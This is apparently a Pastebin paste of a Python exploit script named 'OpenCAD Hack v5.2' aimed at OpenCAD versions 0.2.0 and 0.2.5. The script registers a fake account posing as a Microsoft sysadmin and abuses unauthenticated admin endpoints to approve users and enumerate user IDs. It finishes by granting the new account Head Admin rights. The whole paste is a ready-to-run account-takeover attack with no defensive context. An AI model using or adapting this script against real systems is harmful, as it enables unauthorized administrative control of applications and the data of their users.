Advertisement
Guest User

Untitled

a guest
Apr 9th, 2019
125
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.34 KB | None | 0 0
  1. #!/usr/bin/env python3
  2.  
  3. import requests
  4. import json
  5. import os
  6. import time
  7. import random
  8. from collections import namedtuple
  9.  
  10. HostToHack = "url"
  11. MyUserId = 0
  12. UserRange_Start = 0
  13. UserRange_End = 2048
  14. AntiBlock = 3
  15.  
  16. RandomName = ""
  17. for x in range(7):
  18.     RandomName += str(random.randint(0, 9))
  19.  
  20. User = 'Sysmin_'+RandomName
  21. Email = User+'@microsoft.com'
  22. Pass = RandomName
  23.  
  24. print("OpenCAD Hack v5.2 for 0.2.0/0.2.5 (9th April 2019)\n")
  25.  
  26. # Register a new user
  27. print("Register a new user ("+Email+", "+Pass+")")
  28. r = requests.post(HostToHack+"/actions/register.php", data={'register': 1, 'uname': User, 'email': Email, 'identifier': 'A', 'division[0]': 1, 'password': Pass, 'password1': Pass})
  29. if r.status_code != 200:
  30.     print("Error: "+r.reason)
  31.     os._exit(os.EX_NOPERM)
  32. # Approve all users until new one
  33. print("Approve all users")
  34. for i in range(UserRange_Start, UserRange_End):
  35.     r = requests.post(HostToHack+"/actions/adminActions.php", data={'approveUser': 1, 'uid': i})
  36.     if r.status_code != 200:
  37.         print("Error: "+r.reason)
  38.         os._exit(os.EX_NOPERM)
  39.     r2 = requests.post(HostToHack+"/actions/login.php", data={'email': Email, 'password': Pass})
  40.     if "Your account hasn't been approved yet." not in r2.text:
  41.         break
  42.     print('.', sep=' ', end='', flush=True)
  43.     time.sleep(AntiBlock)
  44. # Get UserID from Email
  45. print("\nGet uid from "+Email)
  46. for i in range(UserRange_Start, UserRange_End):
  47.     r = requests.post(HostToHack+"/actions/adminActions.php", data={'getUserDetails': 1, 'userId': i})
  48.     if r.status_code != 200:
  49.         print("Error: "+r.reason)
  50.         os._exit(os.EX_NOPERM)
  51.     print('.', sep=' ', end='', flush=True)
  52.     usr = json.loads(r.text, object_hook=lambda d: namedtuple('usr', d.keys())(*d.values()))
  53.     if len(usr) >= 3:
  54.         if usr[2] == Email:
  55.             MyUserId = int(usr[0])
  56.             print("\nFound uid: "+usr[0])
  57.             break
  58.     time.sleep(AntiBlock)
  59. # Give Head Admin (Requires UserID)
  60. print("\nGive Head-Admin to "+Email)
  61. r = requests.post(HostToHack+"/actions/adminActions.php", data={'editUserAccount': 1, 'userName': User, 'userEmail': Email, 'userID': MyUserId, 'userIdentifier': 'A', 'userGroups[0]': 0, 'userRole': 2})
  62. if r.status_code != 200:
  63.     print("Error: "+r.reason)
  64.     os._exit(os.EX_NOPERM)
  65.  
  66. print("Done: Email= '"+Email+"' Password= '"+Pass+"'")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement